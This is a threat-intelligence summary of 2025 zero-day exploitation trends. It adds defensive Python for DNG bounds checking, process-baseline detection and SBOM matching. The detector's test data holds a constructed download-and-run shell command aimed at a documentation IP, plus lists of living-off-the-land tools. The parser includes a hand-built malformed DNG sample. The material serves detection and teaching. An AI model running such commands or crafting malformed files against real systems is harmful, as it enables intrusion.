2025 Zero-Day Exploitation Review: Enterprise & OS Targets Dominate
- [01] 90 zero-day vulnerabilities exploited in 2025, with a structural shift toward enterprise and operating system targets.
- [02] Affected systems: Enterprise software, security appliances, networking devices, desktop/mobile operating systems, Oracle EBS, and WinRAR.
- [03] Recommended remediation: Implement timely patching, architectural hardening, and continuous monitoring for effective defense.
Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in the wild during 2025, sustaining the elevated level of exploitation seen in recent years. The count is slightly below 2023's peak of 100 but above 2024's 78, and it stays within the 60-100 range observed every year since 2021. The most significant finding is the continued structural shift toward enterprise technologies, which accounted for a record 43 of the 90 vulnerabilities (48%). That shift reflects attacker interest in platforms that sit at network boundaries or hold privileged access to networks and data, and it is the trend defenders should plan around.
Key Trends in 2025 Zero-Day Exploitation
GTIG’s analysis revealed several pivotal shifts in attacker focus and methods:
- Enterprise Software and Edge Devices as Primary Targets: For the first time, nearly half of all observed zero-day exploits targeted enterprise-grade technology, including 21 zero-days in security and networking devices that sit at the network edge. Many of these appliances cannot run EDR agents, so exploitation leaves few host-level traces, which makes them blind spots for defenders and attractive initial access vectors. In practice, compromise of such a device tends to be visible only in the appliance's own logs, in network telemetry, or in the lateral movement that follows.
- Operating Systems Emerge as Top End-User Target: Browser exploitation fell to under 10% of observed zero-day activity as browser hardening raised the cost of attacks. Operating systems, desktop and mobile, became the most exploited product category with 39 vulnerabilities (44%). Mobile OS exploitation in particular rebounded, driven by longer exploit chains that string together several vulnerabilities.
- Commercial Surveillance Vendors (CSVs) Lead Attributions: For the first time, GTIG attributed more zero-day exploitation to CSVs than to traditional state-sponsored cyber espionage groups. This indicates broader access to sophisticated exploit capabilities and a changing dynamic in the global zero-day market.
- PRC-Nexus Groups Remain Prolific: Consistent with long-term trends, People's Republic of China (PRC)-nexus cyber espionage groups remained the most prolific state-sponsored actors, responsible for at least 10 zero-day exploits. Groups such as UNC3886 and UNC5221 continued to focus on hard-to-monitor edge and networking devices to maintain persistent access, and the mass exploitation GTIG observed points to improved exploit development and distribution capability within these groups.
- Financially Motivated Actors Intensify Zero-Day Use: Financially motivated groups, including ransomware affiliates like FIN11 and UNC2165 (Evil Corp), nearly matched their 2023 high with nine zero-day exploits in 2025. Notable instances include the exploitation of CVE-2025-61882 and CVE-2025-61884 against Oracle E-Business Suite customers and CVE-2025-8088 in WinRAR for malware distribution.
Technical Analysis of Exploited Zero-Days
Attackers primarily used zero-days for remote code execution (RCE) and privilege escalation. The common bug classes followed the target: injection and deserialization flaws in enterprise software, memory corruption (especially use-after-free) in user-facing products such as browsers and OS kernels, and access-control bypasses in edge devices.
Browser Sandbox Escapes and OS-Level Vulnerabilities
In 2025, browser sandbox escapes increasingly targeted the operating system or hardware components beneath the browser rather than the browser itself. For example, CVE-2025-2783 exploited improper handling of sentinel OS handles in Chrome on Windows, leading to code injection and a sandbox escape. On Android, CVE-2025-48543, a use-after-free (UAF) in the Android Runtime (ART) during Java object deserialization, allowed arbitrary code execution within system_server via malicious Notification Parcel objects. Device-specific vulnerabilities included CVE-2025-27038 (Qualcomm Adreno GPU UAF), CVE-2025-6558 (Mali GPU out-of-bounds write), and CVE-2025-14174 (Apple Metal backend memory access), often chained with other vulnerabilities to achieve full compromise.
SonicWall Full-Chain Exploit
GTIG observed a multi-stage exploit for SonicWall Secure Mobile Access (SMA) 1000 series appliances. The chain combined an n-day authentication bypass (CVE-2025-23006), an unpatched deserialization vulnerability giving RCE as the mgmt-server user, and a zero-day local privilege escalation (CVE-2025-40602) in the ctrl-service to reach root. Because the entry point was an already-patched n-day, the chain illustrates both how attackers stack vulnerabilities to reach deep system access and why lagging patches on edge appliances matter: removing the first link denies the attacker the unauthenticated foothold the later stages depended on.
Samsung DNG Vulnerabilities
Samsung's Quram image parsing library was hit by CVE-2025-21043, a zero-day triggered by malicious Digital Negative (DNG) image files that were typically delivered over WhatsApp and processed by the com.samsung.ipservice system service. (CVE-2025-43300, also exploited through DNG files in the same period, is the analogous bug in Apple's ImageIO rather than in Quram.) The Samsung memory corruption bug gave attackers arbitrary code execution inside that unsandboxed service, and with it access to the device's entire MediaStore, with minimal user interaction (1-click exploitation).
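As an added illustration of the bug class (this is not Quram's code, and not the specific flaw behind the CVEs above, whose internals the report does not give): DNG is a TIFF-based container, and a TIFF reader walks an Image File Directory (IFD) whose entries each carry a field type, a count and either an inline value or a file offset. Every one of those fields is attacker-controlled, so a parser must check each computed span against the file size before reading it. The Python below is a minimal bounds-checked IFD0 reader; both sample files are constructed inline, and the hostile one uses a count whose byte size wraps to zero in 32-bit arithmetic, the kind of mistake that produces the memory corruption described above.

```python
import struct

# Byte width of each TIFF 6.0 field type (1=BYTE ... 12=DOUBLE). DNG reuses this layout.
TIFF_TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8, 11: 4, 12: 8}
IFD_ENTRY_LEN = 12


class DngParseError(ValueError):
    """Raised when a header field, offset or count does not fit inside the file."""


def parse_ifd0(data: bytes) -> dict:
    """Parse the TIFF header and the first IFD, bounds-checking every offset and count.

    Returns {tag: value}; SHORT and LONG fields are decoded to tuples, everything else
    is returned as raw bytes. Raises DngParseError instead of reading out of range.
    """
    n = len(data)
    if n < 8:
        raise DngParseError("truncated header")
    if data[:2] == b"II":
        end = "<"
    elif data[:2] == b"MM":
        end = ">"
    else:
        raise DngParseError("bad byte-order mark")
    magic, ifd_off = struct.unpack(end + "HI", data[2:8])
    if magic != 42:
        raise DngParseError("bad TIFF magic")
    # An IFD is a 2-byte entry count, count*12 bytes of entries, then a 4-byte next-IFD
    # pointer. Validate the whole span before touching any of it.
    if ifd_off < 8 or ifd_off + 2 > n:
        raise DngParseError("IFD offset outside file")
    (count,) = struct.unpack(end + "H", data[ifd_off:ifd_off + 2])
    entries_start = ifd_off + 2
    if entries_start + count * IFD_ENTRY_LEN + 4 > n:
        raise DngParseError(f"IFD claims {count} entries but the file is only {n} bytes")

    tags = {}
    for i in range(count):
        pos = entries_start + i * IFD_ENTRY_LEN
        tag, ftype, fcount, value_or_off = struct.unpack(end + "HHII", data[pos:pos + 12])
        width = TIFF_TYPE_SIZES.get(ftype)
        if width is None:
            raise DngParseError(f"tag {tag}: unknown field type {ftype}")
        # In a C parser this multiply is where a 32-bit size wraps (4 * 0x40000000 == 0);
        # Python integers do not wrap, so the range check below sees the true size.
        total = width * fcount
        if total <= 4:
            raw = data[pos + 8:pos + 8 + total]  # value is stored inline in the entry
        else:
            if value_or_off < 8 or value_or_off + total > n:
                raise DngParseError(
                    f"tag {tag}: {total} bytes at offset {value_or_off} exceed the {n}-byte file")
            raw = data[value_or_off:value_or_off + total]
        if ftype == 3:
            tags[tag] = struct.unpack(end + f"{fcount}H", raw)
        elif ftype == 4:
            tags[tag] = struct.unpack(end + f"{fcount}I", raw)
        else:
            tags[tag] = raw
    return tags


def dng_is_well_formed(data: bytes) -> bool:
    """True if IFD0 parses without any out-of-range access, else False."""
    try:
        parse_ifd0(data)
        return True
    except DngParseError:
        return False


# --- Constructed sample files (hand-assembled for this example, not from any real exploit) ---

def _entry(tag, ftype, fcount, payload):
    """One little-endian IFD entry with its value stored inline (payload is at most 4 bytes)."""
    return struct.pack("<HHI", tag, ftype, fcount) + payload.ljust(4, b"\0")


def _tiff(entries):
    """Minimal little-endian TIFF/DNG: header at 0, IFD0 at 8, no next IFD."""
    return (b"II" + struct.pack("<HI", 42, 8) + struct.pack("<H", len(entries))
            + b"".join(entries) + struct.pack("<I", 0))


GOOD_DNG = _tiff([
    _entry(256, 3, 1, struct.pack("<H", 64)),    # ImageWidth = 64
    _entry(257, 3, 1, struct.pack("<H", 48)),    # ImageLength = 48
    _entry(50706, 1, 4, bytes([1, 4, 0, 0])),    # DNGVersion = 1.4.0.0
])

# Hostile file: StripOffsets (tag 273) claims 0x40000000 LONG values at offset 8. Their byte
# size is 0x100000000, which a 32-bit length calculation would wrap to 0 and then trust.
BAD_DNG = _tiff([
    _entry(256, 3, 1, struct.pack("<H", 64)),
    struct.pack("<HHII", 273, 4, 0x40000000, 8),
])

if __name__ == "__main__":
    print(parse_ifd0(GOOD_DNG))
    print("BAD_DNG accepted:", dng_is_well_formed(BAD_DNG))
```

The same pattern (validate the full span, compute sizes in arithmetic that cannot wrap, refuse rather than clamp) applies to every offset-carrying field in DNG, including the SubIFD and strip/tile tables this reader does not follow.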
Prioritizing Defenses and Mitigating Zero-Day Threats
Given the sustained volume of zero-day exploitation, organizations must adopt a proactive and resilient security posture. GTIG emphasizes that vulnerability exploitation remains the leading initial access vector in its incident response investigations, so defenders should plan for compromise rather than assume prevention will hold. Detecting and containing zero-day exploitation therefore requires a multi-layered strategy rather than reliance on patches alone.
Architectural Hardening & Surface Reduction
- Infrastructure: Segment DMZs, firewalls, and VPNs from critical assets to limit lateral movement. Monitor application execution flow so that unexpected database queries and shell commands launched by application processes can be blocked. Expose to the internet only the network ports that are strictly required.
- Personal Devices: Reduce attack surface by turning off cellular, Wi-Fi, and Bluetooth when not needed. Enable advanced protection modes like Android Advanced Protection Mode and iOS Lockdown Mode. Uninstall unused applications and disable unnecessary services.
Advanced Detection & Behavioral Monitoring
- Infrastructure: Enforce strict driver blocklists and flag anomalous kernel-level behavior. Baseline normal system process activity so that living-off-the-land (LotL) activity and persistence mechanisms stand out as deviations. Deploy canary tokens for high-fidelity alerts on lateral movement.
- Personal Devices: Seek expert advice for suspicious links or crashes. Enroll in Google’s Advanced Protection Program and enable enhanced safe browsing features in web browsers.
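The process-baseline approach from the infrastructure bullet above, as an added Python example that is not from the GTIG report: build a set of (parent, child, user) triples from a known-clean window of process-creation events, then score new events against that set and against two fixed rules (a network-facing daemon spawning a shell or interpreter, and a download piped straight into a shell). All log lines are constructed for the example, the names in EDGE_PARENTS and LOTL_CHILDREN are an assumed starting list, and the JSON-lines format is an assumption standing in for whatever the EDR or audit source actually emits.

```python
import json

# Interpreters and fetch tools that are legitimate binaries but typical LotL stages (assumed list).
LOTL_CHILDREN = {"sh", "bash", "dash", "cmd.exe", "powershell.exe", "certutil.exe",
                 "curl", "wget", "python3", "perl", "base64"}
# Internet-facing daemons and appliance services that should essentially never spawn one (assumed list).
EDGE_PARENTS = {"httpd", "nginx", "php-fpm", "java", "mgmt-server", "w3wp.exe"}

# Constructed baseline: process-creation events from a known-clean window on one host.
BASELINE_EVENTS = """\
{"ts":"2025-06-01T08:00:01Z","host":"mgmt01","parent":"systemd","child":"sshd","user":"root"}
{"ts":"2025-06-01T08:00:05Z","host":"mgmt01","parent":"sshd","child":"bash","user":"ops"}
{"ts":"2025-06-01T08:01:00Z","host":"mgmt01","parent":"cron","child":"sh","user":"root"}
{"ts":"2025-06-01T08:01:01Z","host":"mgmt01","parent":"sh","child":"logrotate","user":"root"}
{"ts":"2025-06-01T09:00:00Z","host":"mgmt01","parent":"nginx","child":"nginx","user":"www-data"}
"""

# Constructed events to score: routine activity plus a web daemon that spawns a shell
# which fetches and runs a remote script.
NEW_EVENTS = """\
{"ts":"2025-06-08T03:12:40Z","host":"mgmt01","parent":"sshd","child":"bash","user":"ops"}
{"ts":"2025-06-08T03:13:02Z","host":"mgmt01","parent":"nginx","child":"sh","user":"www-data","cmdline":"sh -c 'curl http://203.0.113.7/a | sh'"}
{"ts":"2025-06-08T03:13:03Z","host":"mgmt01","parent":"sh","child":"curl","user":"www-data","cmdline":"curl http://203.0.113.7/a"}
{"ts":"2025-06-08T03:15:00Z","host":"mgmt01","parent":"cron","child":"sh","user":"root"}
"""


def parse_events(text):
    """JSON-lines text -> list of event dicts (blank lines ignored)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def build_baseline(events):
    """Set of (parent, child, user) triples seen during the clean window."""
    return {(e["parent"], e["child"], e["user"]) for e in events}


def score_event(event, baseline):
    """Reasons this event deviates from expected behaviour; an empty list means benign."""
    reasons = []
    if (event["parent"], event["child"], event["user"]) not in baseline:
        reasons.append("parent/child/user triple not in baseline")
    if event["parent"] in EDGE_PARENTS and event["child"] in LOTL_CHILDREN:
        reasons.append(f"network-facing {event['parent']} spawned {event['child']}")
    cmd = event.get("cmdline", "")
    if any(t in cmd for t in ("curl ", "wget ")) and any(p in cmd for p in ("| sh", "| bash")):
        reasons.append("download piped straight into a shell")
    return reasons


def detect(new_text, baseline_text):
    """Score every new event against the baseline; return only the events with findings."""
    baseline = build_baseline(parse_events(baseline_text))
    alerts = []
    for e in parse_events(new_text):
        reasons = score_event(e, baseline)
        if reasons:
            alerts.append({"ts": e["ts"], "host": e["host"], "parent": e["parent"],
                           "child": e["child"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(NEW_EVENTS, BASELINE_EVENTS):
        print(a["ts"], a["parent"], "->", a["child"], "|", "; ".join(a["reasons"]))
```

The baseline here is deliberately crude: a production version keys it by host role, normalises command lines before comparing, and ages out stale entries. The fixed rules are what catch the nginx-to-shell event even on a host with no history, which is the situation on an edge appliance that only exports syslog and cannot run an agent.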
Operational Response
- Infrastructure: Maintain a software bill of materials (SBOM) so that affected libraries can be identified quickly after a CVE disclosure. Establish a process for immediate patching of actively exploited vulnerabilities, even where it bypasses standard change management. When no patch is available, isolate the affected systems and components with stop-gap measures such as disabling services or blocking the relevant ports at the perimeter.
- Personal Devices: Reboot devices regularly, which clears implants that have not achieved persistence. Exercise caution and avoid clicking on links or downloading attachments from unknown contacts.
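The SBOM step from the infrastructure bullet above, as an added Python example (not tooling from the report): match a CycloneDX-style component list against an advisory feed that expresses affected ranges as introduced/fixed versions, keyed on the version-stripped package URL (purl). The SBOM fragment, the advisory entries and their ADV-EXAMPLE identifiers are constructed placeholders rather than real packages or CVEs, and the version comparison assumes plain dotted numeric versions.

```python
import json

# Constructed CycloneDX-style SBOM fragment for an internal service (not a real inventory).
SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "name": "archive-tool", "version": "7.12",
     "purl": "pkg:generic/archive-tool@7.12"},
    {"type": "library", "name": "json-codec", "version": "1.2.80",
     "purl": "pkg:maven/example/json-codec@1.2.80"},
    {"type": "library", "name": "imgparse", "version": "3.4.1",
     "purl": "pkg:generic/imgparse@3.4.1"}
  ]
}
"""

# Constructed advisory feed with placeholder identifiers (not real CVEs). Each entry names the
# version-stripped purl, the first affected version and the first fixed version.
ADVISORIES = [
    {"id": "ADV-EXAMPLE-0001", "purl": "pkg:generic/archive-tool",
     "introduced": "0", "fixed": "7.13"},
    {"id": "ADV-EXAMPLE-0002", "purl": "pkg:maven/example/json-codec",
     "introduced": "1.2.0", "fixed": "1.2.83"},
    {"id": "ADV-EXAMPLE-0003", "purl": "pkg:generic/imgparse",
     "introduced": "3.5.0", "fixed": "3.5.2"},
]


def version_key(v):
    """Plain dotted numeric version -> tuple of ints ('7.12' -> (7, 12)).

    Assumption: no pre-release suffixes or epochs; a real matcher must apply the
    ecosystem's own ordering rules (semver, Maven, Debian, ...).
    """
    return tuple(int(p) for p in v.split("."))


def is_affected(version, introduced, fixed):
    """Half-open range [introduced, fixed): the fix version itself is not affected."""
    return version_key(introduced) <= version_key(version) < version_key(fixed)


def strip_version(purl):
    """'pkg:maven/example/json-codec@1.2.80' -> 'pkg:maven/example/json-codec'.
    Assumes the purl carries no qualifiers or subpath after the version."""
    return purl.split("@", 1)[0]


def match_sbom(sbom_text, advisories):
    """One finding per (component, advisory) pair whose version falls inside the affected range."""
    sbom = json.loads(sbom_text)
    by_purl = {}
    for adv in advisories:
        by_purl.setdefault(adv["purl"], []).append(adv)
    findings = []
    for comp in sbom.get("components", []):
        for adv in by_purl.get(strip_version(comp["purl"]), []):
            if is_affected(comp["version"], adv["introduced"], adv["fixed"]):
                findings.append({"component": comp["purl"], "advisory": adv["id"],
                                 "upgrade_to": adv["fixed"]})
    return findings


if __name__ == "__main__":
    for f in match_sbom(SBOM_JSON, ADVISORIES):
        print(f"{f['component']}: {f['advisory']} -> upgrade to {f['upgrade_to']}")
```

Keying on the purl rather than the bare component name avoids false matches between unrelated packages that share a name across ecosystems, and the half-open range means a component already on the fix version is correctly reported clean.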